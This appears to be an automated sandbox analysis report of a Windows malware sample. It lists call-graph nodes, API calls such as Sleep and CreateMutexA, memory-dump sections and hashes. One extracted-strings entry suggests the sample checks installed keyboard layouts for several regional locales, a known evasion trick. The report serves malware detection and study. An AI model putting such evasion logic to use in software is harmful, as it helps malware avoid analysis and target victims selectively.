f420cc 11628 f5c3d5 11625->11628 11627 f5c69b 11627->11624 11629 f5c3e1 11628->11629 11630 f5c3eb 11628->11630 11631 f5c3be 11629->11631 11632 f5c39e 11629->11632 11630->11627 11641 f5cd0a 11631->11641 11632->11630 11637 f5ccd5 11632->11637 11635 f5c3d0 11635->11627 11638 f5cce3 InitializeCriticalSectionEx 11637->11638 11639 f5c3b7 11637->11639 11638->11639 11639->11627 11642 f5cd1f RtlInitializeConditionVariable 11641->11642 11642->11635 11807 f42e00 11808 f42e28 11807->11808 11809 f5c68b __Mtx_init_in_situ 2 API calls 11808->11809 11810 f42e33 11809->11810 12073 f48980 12075 f48aea 12073->12075 12076 f489d8 shared_ptr 12073->12076 12074 f45c10 6 API calls 12074->12076 12076->12074 12076->12075 11725 f43c8e 11726 f43c98 11725->11726 11728 f43ca5 11726->11728 11733 f42410 11726->11733 11729 f43ccf 11728->11729 11730 f43810 4 API calls 11728->11730 11731 f43810 4 API calls 11729->11731 11730->11729 11732 f43cdb 11731->11732 11734 f42424 11733->11734 11737 f5b52d 11734->11737 11745 f73aed 11737->11745 11739 f4242a 11739->11728 11740 f5b5a5 ___std_exception_copy 11752 f5b1ad 11740->11752 11742 f5b598 11748 f5af56 11742->11748 11756 f74f29 11745->11756 11747 f5b555 11747->11739 11747->11740 11747->11742 11749 f5af9f ___std_exception_copy 11748->11749 11751 f5afb2 shared_ptr 11749->11751 11762 f5b39f 11749->11762 11751->11739 11753 f5b1e1 shared_ptr 11752->11753 11754 f5b1d8 11752->11754 11753->11739 11755 f5b39f 5 API calls 11754->11755 11755->11753 11757 f74f2e __fassign 11756->11757 11757->11747 11758 f7d634 __fassign 4 API calls 11757->11758 11761 f78bfc __fassign 11757->11761 11758->11761 11759 f765ed __fassign 3 API calls 11760 f78c2f 11759->11760 11761->11759 11763 f5bedf InitOnceExecuteOnce 11762->11763 11764 f5b3e1 11763->11764 11765 f5b3e8 11764->11765 11773 f76cbb 11764->11773 11765->11751 11774 f76cc7 __fassign 11773->11774 11775 f7a671 __fassign 4 API calls 11774->11775 11778 f76ccc 11775->11778 11776 f78bec __fassign 4 API calls 11777 f76cf6 11776->11777 11778->11776
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00F7652A,?,?,?,?,?,00F77661), ref: 00F76566
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                                              • Opcode ID: ee7e25cf6f0d801615328c34b33e5e54cf90404ab2b92820f2f25c43e18fc631
                                                                                                                                                                                                                                              • Instruction ID: eab37a614671cf01737db800fe75bd0cc41516134d1bffe1b2d593b25dac4d63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee7e25cf6f0d801615328c34b33e5e54cf90404ab2b92820f2f25c43e18fc631
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7E086304415086ECE267B18CC15D493B5BEB41754F048911FD08C7532CB25ED91E582
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2163389717.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4880000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a89c992299c9c8551eebca68a954e917d19876e3234dbde17bbc145a0c83a318
                                                                                                                                                                                                                                              • Instruction ID: 9c668fb732b6cbf1f695801305d2c8a5233c83c989f05757b391ec35fc55a79b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a89c992299c9c8551eebca68a954e917d19876e3234dbde17bbc145a0c83a318
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A71129FB24D118BDB551A5892B549F66A6EE6D33343328F2FF843C1502E2942A5C7132

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                              • API String ID: 0-3963862150
                                                                                                                                                                                                                                              • Opcode ID: 3075d21847a2b4917c4bc1ae74a5fe5531aaf20192f2a4443a3fd2ead7183ab2
                                                                                                                                                                                                                                              • Instruction ID: 2b0dcfc15a9c2cfc7ab4d78df03c721c40bea453a5ba57400f1f5653af4d0ee0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3075d21847a2b4917c4bc1ae74a5fe5531aaf20192f2a4443a3fd2ead7183ab2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19F1D1709002589BEF24DF58CC84BDEBBB9EF45704F504699F908E7281DB74AA88DF91

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 185 f49ba5-f49d91 call f57a00 call f45c10 call f48b30 call f58220
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 475f15718a5454448e910e078b88ad53a5fdd667dcddaaf99ebb6b3862090965
                                                                                                                                                                                                                                              • Instruction ID: 94f29e5adebdee69d621262f4bc21afc7e8b0374b46fb982e8e62ee61f68020b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 475f15718a5454448e910e078b88ad53a5fdd667dcddaaf99ebb6b3862090965
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7318A71B442048BEB18DB7CDCC5B5EBF62EBC2324F204619E804D72E5C7B98980A752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 207 f49f44-f49f64 211 f49f66-f49f72 207->211 212 f49f92-f49fae 207->212 213 f49f74-f49f82 211->213 214 f49f88-f49f8f call f5d663 211->214 215 f49fb0-f49fbc 212->215 216 f49fdc-f49ffb 212->216 213->214 219 f4a92b 213->219 214->212 221 f49fd2-f49fd9 call f5d663 215->221 222 f49fbe-f49fcc 215->222 217 f49ffd-f4a009 216->217 218 f4a029-f4a916 call f580c0 216->218 223 f4a01f-f4a026 call f5d663 217->223 224 f4a00b-f4a019 217->224 226 f4a953-f4a994 Sleep CreateMutexA 219->226 227 f4a92b call f76c6a 219->227 221->216 222->219 222->221 223->218 224->219 224->223 237 f4a996-f4a998 226->237 238 f4a9a7-f4a9a8 226->238 227->226 237->238 239 f4a99a-f4a9a5 237->239 239->238
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
